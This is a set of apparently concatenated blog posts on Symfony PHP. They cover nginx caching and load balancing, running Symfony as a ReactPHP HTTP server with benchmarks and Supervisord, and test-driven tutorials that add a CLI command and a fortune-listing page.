bin/console cache:clear -e=prod --no-debug
Now we can check the Response's headers:
curl -I 'http://super-speed-nginx.example.com/'
curl -I 'http://super-speed-nginx.example.com/'
The first one should contain a X-Cache header set to MISS, while the second
one should be set to HIT.
Let's have a quick benchmark:
curl 'http://super-speed-nginx.example.com/'
ab -t 10 -c 10 'http://super-speed-nginx.example.com/'
The result:
That's around 140 times faster than without cache.
In the above examples, we've seen some usage of proxy_pass in nginx. It allows
the proxy to forward the request to an "upstream" server (e.g. PHP-FPM).
By providing many upstream servers for one proxy_pass, we enable nginx's load
balancing which can be useful with the ReactPHP set up from the previous article
for example:
# /etc/nginx/sites-available/super-speed-nginx
upstream backend {
server 127.0.0.1:5500 max_fails=1 fail_timeout=5s;
server 127.0.0.1:5501 max_fails=1 fail_timeout=5s;
server 127.0.0.1:5502 max_fails=1 fail_timeout=5s;
server 127.0.0.1:5503 max_fails=1 fail_timeout=5s;
}
server {
root /home/foobar/bench-sf-standard/web/;
server_name localhost;
location / {
try_files $uri @backend;
}
location @backend {
proxy_pass http://backend;
proxy_next_upstream http_502 timeout error;
proxy_connect_timeout 1;
proxy_send_timeout 5;
proxy_read_timeout 5;
}
}
Note:
proxy_next_upstream: conditions to satisfy in order to forward the request to another server (here errors and timeouts)proxy_connect_timeout: maximum time when trying to connect to an upstream serverproxy_send_timeout: maximum time when trying to send data to an upstream serverproxy_read_timeout: maximum time when trying to read data from an upstream server
With a reverse proxy such as nginx, we can decrease the number of calls to our applications by:
This results in a drastic reduction of response time from the point of view of the client.
Resources:
]]>TL;DR: Run your application as a HTTP server to increase its performances.
HTTP frameworks, such as Symfony, allow us to build applications that have the potential to achieve Super Speed.
A first way to make use of it is to run our application as a HTTP server. In this article we'll take a Symfony application and demonstrate how to run it as HTTP server using ReactPHP.
We're going to use ReactPHP's HTTP component:
composer require react/http:^0.5@dev
It helps us build HTTP servers:
#!/usr/bin/env php
<?php
// bin/react.php
require __DIR__.'/../vendor/autoload.php';
$loop = React\EventLoop\Factory::create();
$socket = new React\Socket\Server($loop);
$http = new React\Http\Server($socket);
$callback = function ($request, $response) {
};
$http->on('request', $callback);
$socket->listen(1337);
$loop->run();
Starting from the last line, we have:
$loop->run(): makes our HTTP server run inside an infinite loop (that's how long running processes work)$socket->listen(1337): opens a socket by listening to a port (that's how servers work)$http->on('request', $callback): for each HTTP Request received, executes the given callbackNote: HTTP servers usually use the
80port, but nothing prevents us from using a different one. Since there might be some HTTP servers already running on our computers (e.g. Apache or nginx), we'll use1337in our examples to avoid conflicts.
The application logic has to be written in the callback. For example, here's how
to write a Hello World!:
#!/usr/bin/env php
<?php
// bin/react.php
require __DIR__.'/../vendor/autoload.php';
$loop = React\EventLoop\Factory::create();
$socket = new React\Socket\Server($loop);
$http = new React\Http\Server($socket);
$callback = function ($request, $response) {
$statusCode = 200;
$headers = array(
'Content-Type: text/plain'
);
$content = 'Hello World!';
$response->writeHead($statusCode, $headers);
$response->end($content);
};
$http->on('request', $callback);
$socket->listen(1337);
$loop->run();
If we run it now:
php bin/react.php
Then we can visit the page at http://localhost:1337/,
and see a Hello World! message: it works!
Let's recreate the same project, but using the Symfony Standard Edition:
composer create-project symfony/framework-standard-edition super-speed
cd super-speed
composer require react/http:^0.5@dev --ignore-platform-reqs
Since Symfony is a HTTP framework, wrapping it inside the callback is quite natural. We only need to:
HttpKernelInterface implementation to get a Symfony responseAs we can see, this is quite straightforward:
#!/usr/bin/env php
<?php
// bin/react.php
require __DIR__.'/../app/autoload.php';
$kernel = new AppKernel('prod', false);
$callback = function ($request, $response) use ($kernel) {
$method = $request->getMethod();
$headers = $request->getHeaders();
$query = $request->getQuery();
$content = $request->getBody();
$post = array();
if (in_array(strtoupper($method), array('POST', 'PUT', 'DELETE', 'PATCH')) &&
isset($headers['Content-Type']) && (0 === strpos($headers['Content-Type'], 'application/x-www-form-urlencoded'))
) {
parse_str($content, $post);
}
$sfRequest = new Symfony\Component\HttpFoundation\Request(
$query,
$post,
array(),
array(), // To get the cookies, we'll need to parse the headers
$request->getFiles(),
array(), // Server is partially filled a few lines below
$content
);
$sfRequest->setMethod($method);
$sfRequest->headers->replace($headers);
$sfRequest->server->set('REQUEST_URI', $request->getPath());
if (isset($headers['Host'])) {
$sfRequest->server->set('SERVER_NAME', explode(':', $headers['Host'])[0]);
}
$sfResponse = $kernel->handle($sfRequest);
$response->writeHead(
$sfResponse->getStatusCode(),
$sfResponse->headers->all()
);
$response->end($sfResponse->getContent());
$kernel->terminate($request, $response);
};
$loop = React\EventLoop\Factory::create();
$socket = new React\Socket\Server($loop);
$http = new React\Http\Server($socket);
$http->on('request', $callback);
$socket->listen(1337);
$loop->run();
Note: Request conversion code from React to Symfony has been borrowed from M6Web PhpProcessManagerBundle.
And as easy as that, we can run it:
php bin/react.php
Finally we can visit the page at http://localhost:1337/,
and see a helpful Welcome message: it works!
It's now time to check if we've achieved our goal: did we improve performances?
In order to find out, we can first benchmark the regular Symfony application:
SYMFONY_ENV=prod SYMFONY_DEBUG=0 composer install -o --no-dev --ignore-platform-reqs
php -S localhost:1337 -t web&
curl 'http://localhost:1337/app.php/'
ab -c 1 -t 10 'http://localhost:1337/app.php/'
We get the following results:
We can also profile the application using Blackfire to discover bottlenecks:
blackfire curl 'http://localhost:1337/app.php/'
killall -9 php
We get the following results:
Let's have a look at the graph:
As expected from an empty application without any logic, we can clearly see that autoloading is the number 1 bottleneck, with the Dependency Injection Container being its main caller (for which the EventDispatcher is the main caller).
Before we continue our benchmarks for the ReactPHP version of our application, we'll need to modify it a bit in order to support Blackfire:
#!/usr/bin/env php
<?php
// bin/react.php
require __DIR__.'/../app/autoload.php';
$kernel = new AppKernel('prod', false);
$callback = function ($request, $response) use ($kernel) {
$method = $request->getMethod();
$headers = $request->getHeaders();
$enableProfiling = isset($headers['X-Blackfire-Query']);
if ($enableProfiling) {
$blackfire = new Blackfire\Client();
$probe = $blackfire->createProbe();
}
$query = $request->getQuery();
$content = $request->getBody();
$post = array();
if (in_array(strtoupper($method), array('POST', 'PUT', 'DELETE', 'PATCH')) &&
isset($headers['Content-Type']) && (0 === strpos($headers['Content-Type'], 'application/x-www-form-urlencoded'))
) {
parse_str($content, $post);
}
$sfRequest = new Symfony\Component\HttpFoundation\Request(
$query,
$post,
array(),
array(), // To get the cookies, we'll need to parse the headers
$request->getFiles(),
array(), // Server is partially filled a few lines below
$content
);
$sfRequest->setMethod($method);
$sfRequest->headers->replace($headers);
$sfRequest->server->set('REQUEST_URI', $request->getPath());
if (isset($headers['Host'])) {
$sfRequest->server->set('SERVER_NAME', explode(':', $headers['Host'])[0]);
}
$sfResponse = $kernel->handle($sfRequest);
$response->writeHead(
$sfResponse->getStatusCode(),
$sfResponse->headers->all()
);
$response->end($sfResponse->getContent());
$kernel->terminate($request, $response);
if ($enableProfiling) {
$blackfire->endProbe($probe);
}
};
$loop = React\EventLoop\Factory::create();
$socket = new React\Socket\Server($loop);
$http = new React\Http\Server($socket);
$http->on('request', $callback);
$socket->listen(1337);
$loop->run();
This requires Blackfire's SDK:
SYMFONY_ENV=prod SYMFONY_DEBUG=0 composer require -o --update-no-dev --ignore-platform-reqs 'blackfire/php-sdk'
Now let's run the benchmarks:
php bin/react.php&
curl 'http://localhost:1337/'
ab -c 1 -t 10 'http://localhost:1337/'
We get the following results:
Finally we can profile it:
curl -H 'X-Blackfire-Query: enable' 'http://localhost:1337/'
killall -9 php
We get the following results:
Let's have a look at the graph:
This time we can see that most of the time is spent in event listeners, which is expected since that's the only lace in our empty application where there's any logic.
There's no denial, we've made use of our potential to achieve Super Speed: by converting our application into a HTTP server using ReactPHP we improved our Symfony application by 8!
After running some silly benchmarks, we've picked ReactPHP as it was seemingly yielding better results:

However since we don't actually make use of the true potential of any of those projects, it's worth mentioning them and their differences:
Not mentioned in the graph, there's also:
Note: To check the benchmarks, have a look at Bench Symfony Standard. Each project has its own branch with the set up used and the benchmarks results.
To understand how turning our application into a HTTP server can increase performances, we have to take a look how the alternative works. In a regular stack (e.g. "Apache / mod_php" or "nginx / PHP-FPM"), for each HTTP request:
$_GET, $_POST, etc) are created using data from the RequestAmongst the advantages this brings, we can list not having to worry (too much) about:
Killing the PHP process once the Response is sent means that nothing is shared between two Requests (hence the name "shared-nothing" architecture).
One of the biggest disadvantages of such a set up is low performance., because creating a PHP process for each HTTP Requests means adding a bootstraping footprint which includes:
With ReactPHP we keep our application alive between requests so we only execute this bootstrap once when starting the server: the footprint is absent from Requests.
However now the tables are turned: we're vulnerable to memory consumption, fatal error, statefulness and code update worries.
So turning our application into a HTTP server means that way have to be mindful developers: we have to make it stateless and we need to restart the server for each updates.
Regarding fatal errors and memory consumption, there is a simple strategy to we can use to mitigate their impact: automatically restart the server once it's stopped.
That's usually a feature included in load balancers (for example in PHP-PM, Aerys and appserver.io), but we can also rely on Supervisord.
On Debian based distributions it can easily be installed:
sudo apt-get install -y supervisor
Here's a configuration example (create a *.conf file in /etc/supervisord/conf.d):
[program:bench-sf-standard]
command=php bin/react.php
environment=PORT=55%(process_num)02d
process_name=%(program_name)s-%(process_num)d
numprocs=4
directory=/home/foobar/bench-sf-standard
umask=022
user=foobar
stdout_logfile=/var/log/supervisord/%(program_name)s-%(process_num)d.log ; stdout log path, NONE for none; default AUTO
stderr_logfile=/var/log/supervisord/%(program_name)s-%(process_num)d-error.log ; stderr log path, NONE for none; default AUTO
autostart=true
autorestart=true
startretries=3
It will:
5500, 5501, 5502 and 5503Here's a nice resource for it: Monitoring Processes with Supervisord.
While PHP itself doesn't leak memory, our application might. The more memory a PHP application uses, the slower it will get, until it reaches the limit and crashes. As a safeguard, we can:
But a better way would be to actually hunt down memoy leaks, for example with PHP meminfo.
We also need to know a bit more about the tools we use such as Doctrine ORM or Monolog to avoid pitfalls (or use the LongRunning library to clean those automatically for us).
It only takes ~50 lines to turn our application into a HTTP server, ReactPHP is indeed a powerful library.
In fact we haven't even used its main features and still managed to greatly improve performances! But these will be the subject of a different article.
Note: Read-only APIs are a good candidate for such a set up.
In the next blog post, we'll have a look at a different way (not that we can't combine both) to achieve the Super Speed potential of our applications built with HTTP frameworks like Symfony.
In the meantime, here's some resources about turning our applications into HTTP applications:
]]>Reference: This article is intended to be as complete as possible and is kept up to date.
TL;DR: Practice makes Better.
In this guide we've explored the main standalone libraries (also known as "Components") provided by Symfony to help us build applications:
We've also seen how HttpKernel enabled reusable code with Bundles, and the different ways to organize our application tree directory.
Finally we've started to put all this knowledge in practice by creating a "fortune" project with:
In this article, we're going to continue the "fortune" project by creating a command that prints the last fortune.
Note: To start with the same code, use the following repository:
git clone https://github.com/gnugat-examples/fortune.git cd fortune composer install -o --ignore-platform-reqs git checkout web-example git checkout -b cli-example
The CLI equivalent of a web Controller is a Command. We're first going to create a functional test:
<?php
// tests/AppBundle/Command/PrintLastFortuneCommandTest.php
namespace Tests\AppBundle\Command;
use Symfony\Bundle\FrameworkBundle\Console\Application;
use Symfony\Component\Console\Tester\ApplicationTester;
class PrintLastFortuneCommandTest extends \PHPUnit_Framework_TestCase
{
private $app;
protected function setUp()
{
$kernel = new \AppKernel('test', false);
$application = new Application($kernel);
$application->setAutoExit(false);
$this->app = new ApplicationTester($application);
}
/**
* @test
*/
public function it_prints_last_fortune()
{
$input = array(
'print-last-fortune',
);
$exitCode = $this->app->run($input);
self::assertSame(0, $exitCode, $this->app->getDisplay());
}
}
Successful commands always return 0 as an exit code, which is what we're going
to check in this test. Let's run the suite:
vendor/bin/phpunit
They fail, telling us to create the actual code for the command:
<?php
// src/AppBundle/Command/PrintLastFortuneCommand.php
namespace AppBundle\Command;
use Symfony\Component\Console\Command\Command;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Output\OutputInterface;
class PrintLastFortuneCommand extends Command
{
protected function configure()
{
$this->setName('print-last-fortune');
}
protected function execute(InputInterface $input, OutputInterface $output)
{
}
}
Since Symfony looks automatically for classes that extend Command in the
Command directory of each registered bundle, our command is now available:
vendor/bin/phpunit
The test suite is now green. We can run it using the console:
bin/console print-last-fortune
We should successfully get an empty line.
In order to get something else than an empty line, we need to create a new use case. It's purpose will be to convey intent (print the last fortune) and to validate the input parameters:
<?php
// tests/AppBundle/Service/PrintLastFortuneTest.php
namespace Tests\AppBundle\Service;
use AppBundle\Service\PrintLastFortune;
class PrintLastFortuneTest extends \PHPUnit_Framework_TestCase
{
/**
* @test
*/
public function it_has_no_parameters()
{
$printLastFortune = new PrintLastFortune();
}
}
Well, currently we don't have any input parameters. But if we get a new requirement that does need input parameters, we'll be ready to validate them. For now we can run the tests:
vendor/bin/phpunit
They fail because we need to create the actual class:
<?php
// src/AppBundle/Service/PrintLastFortune.php
namespace AppBundle\Service;
class PrintLastFortune
{
}
This should fix the issue:
vendor/bin/phpunit
Now let's create Handler that will list all fortunes:
<?php
// tests/AppBundle/Service/PrintLastFortuneHandlerTest.php
namespace Tests\AppBundle\Service;
use AppBundle\Service\FindLastFortune;
use AppBundle\Service\PrintLastFortune;
use AppBundle\Service\PrintLastFortuneHandler;
class PrintLastFortuneHandlerTest extends \PHPUnit_Framework_TestCase
{
const CONTENT = 'Why do witches burn?';
private $findLastFortune;
private $printLastFortuneHandler;
protected function setUp()
{
$this->findLastFortune = $this->prophesize(FindLastFortune::class);
$this->printLastFortuneHandler = new PrintLastFortuneHandler(
$this->findLastFortune->reveal()
);
}
/**
* @test
*/
public function it_prints_last_fortune()
{
$printLastFortune = new PrintLastFortune();
$lastFortune = array(
'content' => self::CONTENT,
);
$this->findLastFortune->findLast()->willReturn($lastFortune);
self::assertSame($lastFortune, $this->printLastFortuneHandler->handle($printLastFortune));
}
}
Let's run the tests:
vendor/bin/phpunit
They're telling us to create PrintLastFortuneHandler:
<?php
// src/AppBundle/Service/PrintLastFortuneHandler.php
namespace AppBundle\Service;
class PrintLastFortuneHandler
{
private $findLastFortune;
public function __construct(FindLastFortune $findLastFortune)
{
$this->findLastFortune = $findLastFortune;
}
public function handle(PrintLastFortune $printLastFortune)
{
return $this->findLastFortune->findLast();
}
}
This should fix this specific error:
vendor/bin/phpunit
Now our tests are telling us to create FindLastFortune:
<?php
// src/AppBundle/Service/FindLastFortune.php
namespace AppBundle\Service;
interface FindLastFortune
{
public function findLast();
}
Let's see if it did the trick:
vendor/bin/phpunit
Yes it did! To sum up what we've done in this section:
PrintLastFortune use case which could be validating input parameter,
for now it's empty and only serve us to convey intention (use case: print last fortunes)PrintLastFortuneHandler class that calls services which will
do the actual logicFindLastFortune interface, its implementations will find the
last fortuneWe're going to use Doctrine DBAL to actually find all fortunes from a database.
This can be done by creating an implementation of FindLastFortune:
<?php
// src/AppBundle/Service/Bridge/DoctrineDbalFindLastFortune.php
namespace AppBundle\Service\Bridge;
use AppBundle\Service\FindLastFortune;
use Doctrine\DBAL\Driver\Connection;
class DoctrineDbalFindLastFortune implements FindLastFortune
{
private $connection;
public function __construct(Connection $connection)
{
$this->connection = $connection;
}
public function findLast()
{
$queryBuilder = $this->connection->createQueryBuilder();
$queryBuilder->select('*');
$queryBuilder->from('fortune');
$queryBuilder->orderBy('id', 'DESC');
$queryBuilder->setMaxResults(1);
$sql = $queryBuilder->getSql();
$parameters = $queryBuilder->getParameters();
$statement = $this->connection->prepare($sql);
$statement->execute($parameters);
return $statement->fetch();
}
}
This was the last class we needed to write. We can now use PrintLastFortune
in our command:
<?php
// src/AppBundle/Command/PrintLastFortuneCommand.php
namespace AppBundle\Command;
use AppBundle\Service\PrintLastFortune;
use AppBundle\Service\PrintLastFortuneHandler;
use Symfony\Component\Console\Command\Command;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Output\OutputInterface;
class PrintLastFortuneCommand extends Command
{
private $printLastFortuneHandler;
public function __construct(PrintLastFortuneHandler $printLastFortuneHandler)
{
$this->printLastFortuneHandler = $printLastFortuneHandler;
parent::__construct();
}
protected function configure()
{
$this->setName('print-last-fortune');
}
protected function execute(InputInterface $input, OutputInterface $output)
{
$printLastFortune = new PrintLastFortune();
$lastFortune = $this->printLastFortuneHandler->handle($printLastFortune);
$output->writeln($lastFortune['content']);
}
}
Note: In the command, we extract Input parameters and options to put them in
PrintLastFortunewhich is going to validate them. We then simply callPrintLastFortuneHandlerto take care of the logic associated toPrintLastFortune.
Now all that's left to do is wire everything together using Dependency Injection:
# app/config/services.yml
services:
# Commands
app.print_last_fortune_command:
class: 'AppBundle\Command\PrintLastFortuneCommand'
arguments:
- '@app.print_last_fortune_handler'
tags:
- { name: console.command }
# Controllers
app.api.fortune_controller:
class: 'AppBundle\Controller\Api\FortuneController'
arguments:
- '@app.submit_new_fortune_handler'
app.fortune_controller:
class: 'AppBundle\Controller\FortuneController'
arguments:
- '@app.list_all_fortunes_handler'
- '@twig'
# Handlers
app.list_all_fortunes_handler:
class: 'AppBundle\Service\ListAllFortunesHandler'
arguments:
- '@app.find_all_fortunes'
app.print_last_fortune_handler:
class: 'AppBundle\Service\PrintLastFortuneHandler'
arguments:
- '@app.find_last_fortune'
app.submit_new_fortune_handler:
class: 'AppBundle\Service\SubmitNewFortuneHandler'
arguments:
- '@app.save_new_fortune'
# Services
app.find_all_fortunes:
alias: app.bridge.doctrine_dbal_find_all_fortunes
app.bridge.doctrine_dbal_find_all_fortunes:
class: 'AppBundle\Service\Bridge\DoctrineDbalFindAllFortunes'
arguments:
- '@database_connection'
app.find_last_fortune:
alias: app.bridge.doctrine_dbal_find_last_fortune
app.bridge.doctrine_dbal_find_last_fortune:
class: 'AppBundle\Service\Bridge\DoctrineDbalFindLastFortune'
arguments:
- '@database_connection'
app.save_new_fortune:
alias: app.bridge.doctrine_dbal_save_new_fortune
app.bridge.doctrine_dbal_save_new_fortune:
class: 'AppBundle\Service\Bridge\DoctrineDbalSaveNewFortune'
arguments:
- '@database_connection'
# Listeners
app.json_request_content_listener:
class: 'AppBundle\EventListener\JsonRequestContentListener'
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest }
app.exception_listener:
class: 'AppBundle\EventListener\ExceptionListener'
tags:
- { name: kernel.event_listener, event: kernel.exception, method: onKernelException }
Let's run the tests:
rm -rf var/cache/*
./bin/console doctrine:database:drop --force
./bin/console doctrine:database:create
bin/console doctrine:query:sql 'CREATE TABLE fortune (id SERIAL, content TEXT);'
vendor/bin/phpunit
All green! Let's add some fortunes:
php -S localhost:2501 -t web
curl -i -X POST localhost:2501/app.php/api/v1/fortunes -H 'Content-Type: application/json' -d '{"content":"I am sorry to have kept you waiting, but I am afraid my walk has become rather sillier recently"}'
curl -i -X POST localhost:2501/app.php/api/v1/fortunes -H 'Content-Type: application/json' -d '{"content":"Well you cannot expect to wield supreme executive power just because some watery tart threw a sword at you."}'
curl -i -X POST localhost:2501/app.php/api/v1/fortunes -H 'Content-Type: application/json' -d '{"content":"All right... all right... but apart from better sanitation, the medicine, education, wine, public order, irrigation, roads, a fresh water system, and public health ... what have the Romans ever done for us?"}'
We can now check our command:
bin/console print-last-fortune
This time instead of an empty line, we do get the last fortune.
To create a new command, we need to:
console.command tagThe command's logic is then up to us, it doesn't have to be done in a "Symfony" way. For example we can:
Reference: This article is intended to be as complete as possible and is kept up to date.
TL;DR: Practice makes Better.
In this guide we've explored the main standalone libraries (also known as "Components") provided by Symfony to help us build applications:
We've also seen how HttpKernel enabled reusable code with Bundles, and the different ways to organize our application tree directory.
Finally we've started to put all this knowledge in practice by creating a "fortune" project with an endpoint that allows us to submit new fortunes.
In this article, we're going to continue the "fortune" project by creating a page that lists all fortunes.
In the next article we'll also create for this application a command that prints the last fortune.
Note: To start with the same code, use the following repository:
git clone https://github.com/gnugat-examples/fortune.git cd fortune composer install -o --ignore-platform-reqs git checkout api-example git chekcout -b web-example
We'll first start by writing a functional test for our new endpoint:
<?php
// tests/AppBundle/Controller/FortuneControllerTest.php
namespace Tests\AppBundle\Controller;
use Symfony\Component\HttpFoundation\Request;
class FortuneControllerTest extends \PHPUnit_Framework_TestCase
{
private $app;
protected function setUp()
{
$this->app = new \AppKernel('test', false);
}
/**
* @test
*/
public function it_lists_all_fortunes()
{
$request = Request::create('/');
$response = $this->app->handle($request);
self::assertSame(200, $response->getStatusCode(), $response->getContent());
}
}
Just like for our endpoint, we're only interested in checking the status code
of the response (200 is successful response).
Let's run the tests:
vendor/bin/phpunit
They fail, with a 404 NOT FOUND response. That's because we don't have any
controllers, so let's fix that:
<?php
// src/AppBundle/Controller/FortuneController.php
namespace AppBundle\Controller;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
class FortuneController
{
public function listAll(Request $request)
{
return new Response('', 200);
}
}
After creating a controller, the next step is to configure its route:
# app/config/routing.yml
submit_new_fortunes_endpoint:
path: /api/v1/fortunes
defaults:
_controller: app.api.fortune_controller:submit
methods:
- POST
list_all_fortunes_page:
path: /
defaults:
_controller: app.fortune_controller:listAll
methods:
- GET
In this configuration, _controller is set to call the listAll method of the
app.fortune_controller service. Here's how to define this service:
# app/config/services.yml
services:
# Controllers
app.api.fortune_controller:
class: 'AppBundle\Controller\Api\FortuneController'
arguments:
- '@app.submit_new_fortune_handler'
app.fortune_controller:
class: 'AppBundle\Controller\FortuneController'
# Handlers
app.submit_new_fortune_handler:
class: 'AppBundle\Service\SubmitNewFortuneHandler'
arguments:
- '@app.save_new_fortune'
# Services
app.save_new_fortune:
alias: app.bridge.doctrine_dbal_save_new_fortune
app.bridge.doctrine_dbal_save_new_fortune:
class: 'AppBundle\Service\Bridge\DoctrineDbalSaveNewFortune'
arguments:
- '@database_connection'
# Listeners
app.json_request_content_listener:
class: 'AppBundle\EventListener\JsonRequestContentListener'
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest }
app.exception_listener:
class: 'AppBundle\EventListener\ExceptionListener'
tags:
- { name: kernel.event_listener, event: kernel.exception, method: onKernelException }
Now let's try again our tests:
rm -rf var/cache/test
vendor/bin/phpunit
Note: Everytime the configuration changes, we need to remove the cache.
The test suite is now green. Let's start the server:
rm -rf var/cache/prod
php -S localhost:2501 -t web
We can now visit our page: http://localhost:2501/app.php/
We should successfully get a blank page.
So now we have an empty page. Let's fix it by creating a use case to list all fortunes:
<?php
// tests/AppBundle/Service/ListAllFortunesTest.php
namespace Tests\AppBundle\Service;
use AppBundle\Service\ListAllFortunes;
class ListAllFortunesTest extends \PHPUnit_Framework_TestCase
{
/**
* @test
*/
public function it_has_no_parameters()
{
$listAllFortunes = new ListAllFortunes();
}
}
We can now run the tests:
vendor/bin/phpunit
They fail because we need to create the actual class:
<?php
// src/AppBundle/Service/ListAllFortunes.php
namespace AppBundle\Service;
class ListAllFortunes
{
}
Note: Currently the use case class has no parameters to validate. If new requirements come up with the need for some parameters, we're going to be able to check them here.
This should fix the issue:
vendor/bin/phpunit
Now let's create Handler that will list all fortunes:
<?php
// tests/AppBundle/Service/ListAllFortunesHandlerTest.php
namespace Tests\AppBundle\Service;
use AppBundle\Service\FindAllFortunes;
use AppBundle\Service\ListAllFortunes;
use AppBundle\Service\ListAllFortunesHandler;
class ListAllFortunesHandlerTest extends \PHPUnit_Framework_TestCase
{
const CONTENT = "It's just a flesh wound.";
private $listAllFortunesHandler;
private $findAllFortunes;
protected function setUp()
{
$this->findAllFortunes = $this->prophesize(FindAllFortunes::class);
$this->listAllFortunesHandler = new ListAllFortunesHandler(
$this->findAllFortunes->reveal()
);
}
/**
* @test
*/
public function it_submits_new_fortunes()
{
$listAllFortunes = new ListAllFortunes();
$this->findAllFortunes->findAll()->shouldBeCalled();
$this->listAllFortunesHandler->handle($listAllFortunes);
}
}
Let's run the tests:
vendor/bin/phpunit
They're telling us to create ListAllFortunesHandler:
<?php
// src/AppBundle/Service/ListAllFortunesHandler.php
namespace AppBundle\Service;
class ListAllFortunesHandler
{
private $findAllFortunes;
public function __construct(FindAllFortunes $findAllFortunes)
{
$this->findAllFortunes = $findAllFortunes;
}
public function handle(ListAllFortunes $listAllFortunes)
{
return $this->findAllFortunes->findAll();
}
}
This should fix this specific error:
vendor/bin/phpunit
Now our tests are telling us to create FindAllFortunes:
<?php
// src/AppBundle/Service/FindAllFortunes.php
namespace AppBundle\Service;
interface FindAllFortunes
{
public function findAll();
}
Let's see if it did the trick:
vendor/bin/phpunit
Yes it did! To sum up what we've done in this section:
ListAllFortunes use case which could be validating input parameter,
for now it's empty and only serve us to convey intention (use case: list all fortunes)ListAllFortunesHandler class that call services which will
do the actual logicFindAllFortunes interface, its implementations will find all
fortunesWe're going to use Doctrine DBAL to actually find all fortunes from a database.
This can be done by creating an implementation of FindAllFortunes:
<?php
// src/AppBundle/Service/Bridge/DoctrineDbalFindAllFortunes.php
namespace AppBundle\Service\Bridge;
use AppBundle\Service\FindAllFortunes;
use Doctrine\DBAL\Driver\Connection;
class DoctrineDbalFindAllFortunes implements FindAllFortunes
{
private $connection;
public function __construct(Connection $connection)
{
$this->connection = $connection;
}
public function findAll()
{
$queryBuilder = $this->connection->createQueryBuilder();
$queryBuilder->select('*');
$queryBuilder->from('fortune');
$sql = $queryBuilder->getSql();
$parameters = $queryBuilder->getParameters();
$statement = $this->connection->prepare($sql);
$statement->execute($parameters);
return $statement->fetchAll();
}
}
This was the last class we needed to write. We can now use ListAllFortunes
in our controller:
<?php
// src/AppBundle/Controller/FortuneController.php
namespace AppBundle\Controller;
use AppBundle\Service\ListAllFortunes;
use AppBundle\Service\ListAllFortunesHandler;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
class FortuneController
{
private $listAllFortunesHandler;
public function __construct(ListAllFortunesHandler $listAllFortunesHandler)
{
$this->listAllFortunesHandler = $listAllFortunesHandler;
}
public function listAll(Request $request)
{
$listAllFortunes = new ListAllFortunes(
);
$fortunes = $this->listAllFortunesHandler->handle($listAllFortunes);
return new Response('', 200);
}
}
Note: In the controller, we extract Request (input) parameters and put them in
ListAllFortuneswhich is going to validate them. We then simply callListAllFortunesHandlerto take care of the logic associated toListAllFortunes.
Now all that's left to do is wire everything together using Dependency Injection:
# app/config/services.yml
services:
# Controllers
app.api.fortune_controller:
class: 'AppBundle\Controller\Api\FortuneController'
arguments:
- '@app.submit_new_fortune_handler'
app.fortune_controller:
class: 'AppBundle\Controller\FortuneController'
arguments:
- '@app.list_all_fortunes_handler'
# Handlers
app.list_all_fortunes_handler:
class: 'AppBundle\Service\ListAllFortunesHandler'
arguments:
- '@app.find_all_fortunes'
app.submit_new_fortune_handler:
class: 'AppBundle\Service\SubmitNewFortuneHandler'
arguments:
- '@app.save_new_fortune'
# Services
app.find_all_fortunes:
alias: app.bridge.doctrine_dbal_find_all_fortunes
app.bridge.doctrine_dbal_find_all_fortunes:
class: 'AppBundle\Service\Bridge\DoctrineDbalFindAllFortunes'
arguments:
- '@database_connection'
app.save_new_fortune:
alias: app.bridge.doctrine_dbal_save_new_fortune
app.bridge.doctrine_dbal_save_new_fortune:
class: 'AppBundle\Service\Bridge\DoctrineDbalSaveNewFortune'
arguments:
- '@database_connection'
# Listeners
app.json_request_content_listener:
class: 'AppBundle\EventListener\JsonRequestContentListener'
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest }
app.exception_listener:
class: 'AppBundle\EventListener\ExceptionListener'
tags:
- { name: kernel.event_listener, event: kernel.exception, method: onKernelException }
Let's run the tests:
./bin/console doctrine:database:drop --force
./bin/console doctrine:database:create
bin/console doctrine:query:sql 'CREATE TABLE fortune (content TEXT);'
rm -rf var/cache/test
vendor/bin/phpunit
All green!
If we start the server and check the page, it's going to be blank. That's because in our controlller we create a Response with empty content. Let's improve this situation:
<?php
// src/AppBundle/Controller/FortuneController.php
namespace AppBundle\Controller;
use AppBundle\Service\ListAllFortunes;
use AppBundle\Service\ListAllFortunesHandler;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
class FortuneController
{
private $listAllFortunesHandler;
public function __construct(ListAllFortunesHandler $listAllFortunesHandler)
{
$this->listAllFortunesHandler = $listAllFortunesHandler;
}
public function listAll(Request $request)
{
$listAllFortunes = new ListAllFortunes(
);
$fortunes = $this->listAllFortunesHandler->handle($listAllFortunes);
$fortunesHtml = '';
foreach ($fortunes as $fortune) {
$fortunesHtml .= "<li>{$fortune['content']}</li>\n";
}
$html =<<<HTML
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Fortunes</title>
</head>
<body>
<ul>
$fortunesHtml
</ul>
</body>
HTML
;
return new Response($html, 200);
}
}
Let's start the server:
rm -rf var/cache/prod
php -S localhost:2501 -t web
In order to see a list of fortunes, we first need to submit some! We can use our endpoint for this purpose:
curl -i -X POST localhost:2501/app.php/api/v1/fortunes -H 'Content-Type: application/json' -d '{"content":"I came here to have an argument!"}'
curl -i -X POST localhost:2501/app.php/api/v1/fortunes -H 'Content-Type: application/json' -d '{"content":"Has not got as much spam in it as spam egg sausage and spam, has it?"}'
curl -i -X POST localhost:2501/app.php/api/v1/fortunes -H 'Content-Type: application/json' -d '{"content":"The Castle of aaarrrrggh"}'
We can now visit our page: http://localhost:2501/app.php/
While it seems a bit plain (a bit of CSS, javascript and more HTML wouldn't be too much), we do see a list of all fortunes.
Controllers shouldn't contain any "view" logic, let's push it to a template using Twig:
{# app/Resources/views/list-all-fortunes.html.twig #}
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Fortunes</title>
</head>
<body>
<ul>
{% for fortune in fortunes %}
<li>{{ fortune.content }}</li>
{% endfor %}
</ul>
</body>
We now need to use Twig in the controller:
<?php
// src/AppBundle/Controller/FortuneController.php
namespace AppBundle\Controller;
use AppBundle\Service\ListAllFortunes;
use AppBundle\Service\ListAllFortunesHandler;
use Symfony\Component\HttpFoundation\Request;
